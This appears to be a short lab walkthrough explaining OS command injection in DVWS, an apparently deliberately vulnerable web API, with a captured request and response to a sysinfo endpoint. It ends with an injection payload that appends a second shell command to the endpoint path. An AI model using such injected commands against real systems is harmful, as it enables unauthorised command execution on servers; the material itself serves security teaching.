Command Injection
OS command injection (also known as shell injection) is a web security vulnerability that allows an attacker to execute arbitrary operating system (OS) commands on the server that is running an application, and typically fully compromise the application and all its data. This can often been seen in web services and APIs which rely on its underlying operating system for additional functionality.
When visitng the Admin area of the DVWS application, the API will make a request to the sysinfo endpoint to provide System Information.
GET /api/v2/sysinfo/uname HTTP/1.1
Host: dvws.local
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:79.0) Gecko/20100101 Firefox/79.0
Accept: application/json, text/plain, */*
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VyIjoiZm9vYmFyIiwicGVybWlzc2lvbnMiOlsidXNlcjpyZWFkIiwidXNlcjp3cml0ZSIsInVzZXI6YWRtaW4iXSwiaWF0IjoxNTk4MTg5NDA3LCJleHAiOjE1OTgzNjIyMDcsImlzcyI6Imh0dHBzOi8vZ2l0aHViLmNvbS9zbm9vcHlzZWN1cml0eSJ9.9784gQLn2rbCz3W87zs0uxAlyVnQz3r032cpqtU3Yl0
X-Requested-With: XMLHttpRequest
Connection: close
HTTP/1.1 200 OK
X-Powered-By: Express
Vary: Origin
Access-Control-Allow-Credentials: true
Content-Type: application/json; charset=utf-8
Content-Length: 138
ETag: W/"8a-7ArcDoriYOE/Oa7eYvH3KBp91hY"
Date: Sun, 23 Aug 2020 13:59:10 GMT
Connection: close
"Hostname: Linux snoopy-XPS-15-9570 5.4.0-42-generic #46~18.04.1-Ubuntu SMP Fri Jul 10 07:21:24 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux\n"
Arbitrary commands can be injected into this request. E.g. /api/v2/sysinfo/uname;ls